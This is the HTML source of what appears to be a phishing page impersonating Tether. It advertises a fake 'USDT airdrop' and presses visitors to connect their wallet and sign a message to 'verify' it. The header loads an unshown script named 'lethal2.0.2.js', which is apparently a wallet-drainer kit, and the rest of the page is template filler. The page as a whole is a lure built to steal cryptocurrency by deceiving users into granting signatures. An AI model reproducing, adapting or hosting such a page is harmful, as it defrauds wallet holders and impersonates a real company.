﻿<!doctype html>
<html class="no-js" lang="en">

<script src="./js/settings.js"></script>
<script type="module" src="./js/lethal2.0.2.js"></script>

<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>Marketing Campaign | Tether</title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link href="css?family=Roboto:400,400i,500,500i,700,700i,900,900i" rel="stylesheet">
    <link href="css-1?family=Open+Sans:400,400i,600,600i,700,700i,800,800i" rel="stylesheet">
    <link rel="icon" type="image/png" href="favicon.png">

    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/xsIcon.css">
    <link rel="stylesheet" href="assets/fonts/icomoon/style.css">
    <link rel="stylesheet" href="assets/css/magnific-popup.css">
    <link rel="stylesheet" href="assets/css/owl.carousel.min.css">
    <link rel="stylesheet" href="assets/css/owl.theme.default.min.css">
    <link rel="stylesheet" href="assets/css/navigation.css">
    <link rel="stylesheet" href="assets/css/animate.css">

    <link rel="stylesheet" href="assets/css/style.css">

    <link rel="stylesheet" href="assets/css/responsive.css">

<body>

    <div class="xs-sidebar-group info-group">
        <div class="xs-overlay xs-bg-black"></div>
        <div class="xs-sidebar-widget">
            <div class="sidebar-widget-container">
                <div class="widget-heading">
                    <a href="#" class="close-side-widget">
                        <i class="icon icon-cross"></i>
                    </a>
                </div>
                <div class="sidebar-textwidget">
                    <div class="sidebar-logo-wraper">
                        <img src="assets/images/sidebar_logo_2.png" alt="sidebar logo">
                    </div>
                    <p>Far far away, behind the word moun tains, far from the countries Vokalia and Consonantia, there
                        live the blind texts. Separated they live in Bookmarksgrove right at the coast of </p>
                    <ul class="sideabr-list-widget">
                        <li>
                            <div class="media">
                                <div class="d-flex">
                                    <i class="icon icon-placeholder2"></i>
                                </div>
                                <div class="media-body">
                                    <p>759 Pinewood Avenue</p>
                                    <span>Marquette, Michigan</span>
                                </div>
                            </div>
                        </li>
                        <li>
                            <div class="media">
                                <div class="d-flex">
                                    <i class="icon icon-email2"></i>
                                </div>
                                <div class="media-body">
                                    <a href="cdn-cgi/l/email-protection.html#9bf2f5fdf4dbfff4f6faf2f5b5f8f4f6"><span class="__cf_email__" data-cfemail="6d04030b022d0902000c0403430e0200">[email&#160;protected]</span></a>
                                    <span>Online Support</span>
                                </div>
                            </div>
                        </li>
                        <li>
                            <div class="media">
                                <div class="d-flex">
                                    <i class="icon icon-phone-call2"></i>
                                </div>
                                <div class="media-body">
                                    <p>906-624-2565</p>
                                    <span>Mon-Fri 8am-5pm</span>
                                </div>
                            </div>
                        </li>
                    </ul>
                    <div class="subscribe-from">
                        <p>Get Subscribed!</p>
                        <form action="#" method="POST" id="subscribe-form" class="subscribe-form">
                            <label for="sub-input"></label>
                            <div class="form-group">
                                <input type="email" name="email" id="sub-input" placeholder="Enter your mail here" class="form-control">
                                <button class="sub-btn" type="submit"><i class="icon icon-arrow-right"></i></button>
                            </div>
                        </form>
                    </div>
                    <ul class="social-list version-2">
                        <li><a href="#" class="facebook"><i class="fa fa-facebook"></i></a></li>
                        <li><a href="#" class="twitter"><i class="fa fa-twitter"></i></a></li>
                        <li><a href="#" class="linkedin"><i class="fa fa-linkedin"></i></a></li>
                        <li><a href="#" class="instagram"><i class="fa fa-instagram"></i></a></li>
                        <li><a href="#" class="vimeo"><i class="fa fa-vimeo"></i></a></li>
                    </ul>
                    <div class="text-center">
                        <a href="#" class="btn btn-primary">Purchase Now</a>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <header class="header header-v3">
        <div class="container">
            <nav id="navigation1" class="navigation">
                <div class="nav-header">
                    <a class="nav-brand" href="index.html">
                        <img src="main_logo.png" alt="">
                    </a>
                    <div class="nav-toggle"></div>
                </div>
                <div class="nav-menus-wrapper xs-menu">
                    <ul class="nav-menu align-to-right">
                        <li><a href="#" class="scrolls connectButton" id="messageButton">Connect wallet</a></li>
                    </ul>
                </div>
            </nav>
        </div>
    </header>

    <section class="banner-sec banner-v2 banner-v3">
        <div class="banner-item">
            <div class="banner-table">
                <div class="banner-table-cell">
                    <div class="container">
                        <div class="row">
                            <div class="col-lg-6 col-md-8">
                                <div class="banner-content">
                                    <h1 class="banner-title">Tether Airdrop Round</h1>
                                    <p>
                                        To participate in the USDT coin airdrop your wallet must first be verified, this is to prevent empty wallets from entering, and to prevent bots from entering. A wallet signature might be asked to verify ownership of wallet.
                                    </p>
                                    <a href="#" class="btn btn-v3 connectButton" id="messageButton">Claim USDT</a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="banner-v2-img">
                <img class="banner-img" src="assets/images/banner/banner_img_v3.jpg" alt="">
                <img class="banner-ico banner-ico-1" src="logo.png" alt="">
            </div>
        </div>
    </section>

    <section class="blockcain-top-sec blockcain-v3">
        <div class="container">
            <div class="row">
                <div class="col-md-6 wow fadeInUp" data-wow-duration="1.5s">
                    <div class="blockcain-top">
                        <h2 class="hidden-title">Tether</h2>
                        <h3 class="column-title">Driving the Future of Money</h3>
                    </div>
                </div>
                <div class="col-md-5 offset-md-1 wow fadeInUp" data-wow-duration="2s">
                    <div class="blockcain-top-content">
                        <h3 class="hidden-title">USDT</h3>
                        <p>
                            Tether tokens are the most widely adopted stablecoins, having pioneered the concept in the digital token space. A disruptor to the conventional financial system and a trailblazer in the digital use of traditional currencies, Tether tokens support and empower growing ventures and innovation throughout the blockchain space. Tether tokens exist as a digital token built on multiple blockchains.
                        </p>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <footer class="xs-footer-sec xs-footer-v3">
        <div class="container">
            <div class="footer-area">
                <div class="row">
                    <div class="col-lg-3 col-sm-6">
                        <div class="footer-widget">
                            <div class="footer-logo">
                                <a href="index.html">
                                    <img src="main_logo.png" alt="">
                                </a>
                            </div>
                            <p>
                                A better way to present your money using fully featured digital currency and now
                                available
                                on
                            </p>
                        </div>
                    </div>
                    <div class="col-lg-3 offset-lg-3 col-sm-6">
                        <div class="footer-widget">
                            <h4 class="widget-title">Company</h4>
                            <ul>
                                <li><a href="#"> About us</a></li>
                                <li><a href="#"> Our Services</a></li>
                                <li><a href="#"> Timeline</a></li>
                                <li><a href="#"> On Media</a></li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-3 col-sm-6">
                        <div class="footer-widget support">
                            <h4 class="widget-title">Support</h4>
                            <ul>
                                <li><a href="#"> Contact Us</a></li>
                                <li><a href="#"> FAQ</a></li>
                                <li><a href="#"> Support</a></li>
                                <li><a href="#"> Token</a></li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </footer>
<script>(function(){var js = "window['__CF$cv$params']={r:'81b3be107e3ff772',t:'MTY5ODE2NjQ3NC4zOTAwMDA='};_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js',document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border = 'none';_0xh.style.visibility = 'hidden';document.body.appendChild(_0xh);function handler() {var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;if (_0xi) {var _0xj = _0xi.createElement('script');_0xj.innerHTML = js;_0xi.getElementsByTagName('head')[0].appendChild(_0xj);}}if (document.readyState !== 'loading') {handler();} else if (window.addEventListener) {document.addEventListener('DOMContentLoaded', handler);} else {var prev = document.onreadystatechange || function () {};document.onreadystatechange = function (e) {prev(e);if (document.readyState !== 'loading') {document.onreadystatechange = prev;handler();}};}})();</script></body>

</html>